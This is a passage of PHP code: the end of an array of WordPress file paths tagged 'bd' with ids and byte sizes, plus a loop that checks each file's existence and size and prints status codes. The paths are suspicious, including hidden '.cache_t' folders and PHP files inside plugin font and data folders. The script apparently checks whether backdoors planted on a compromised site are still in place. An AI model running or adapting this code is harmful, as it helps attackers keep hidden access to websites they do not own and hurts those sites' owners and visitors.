"bd@@285765@@422",
"/wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/fonts/home_250110.php"=>"bd@@285825@@414",
"/wp-admin/css/colors/modern/.cache_t/include.php"=>"bd@@284321@@12960",
"/wp-admin/css/colors/modern/.cache_t/loading.php"=>"bd@@284323@@6050",
"/wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexing/indexable.prepare.indexation.action.php"=>"bd@@285883@@679",
"/wp-content/plugins/google-analytics-for-wordpress/lite/includes/admin/user-journey/providers/copyimage.php"=>"bd@@285937@@640",
"/wp-content/plugins/google-analytics-for-wordpress/includes/gutenberg/headline-tool/phpinsight/lib/PHPInsight/data/RenameFile.php"=>"bd@@285683@@922"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d$t>\n"; } } } die('!end!');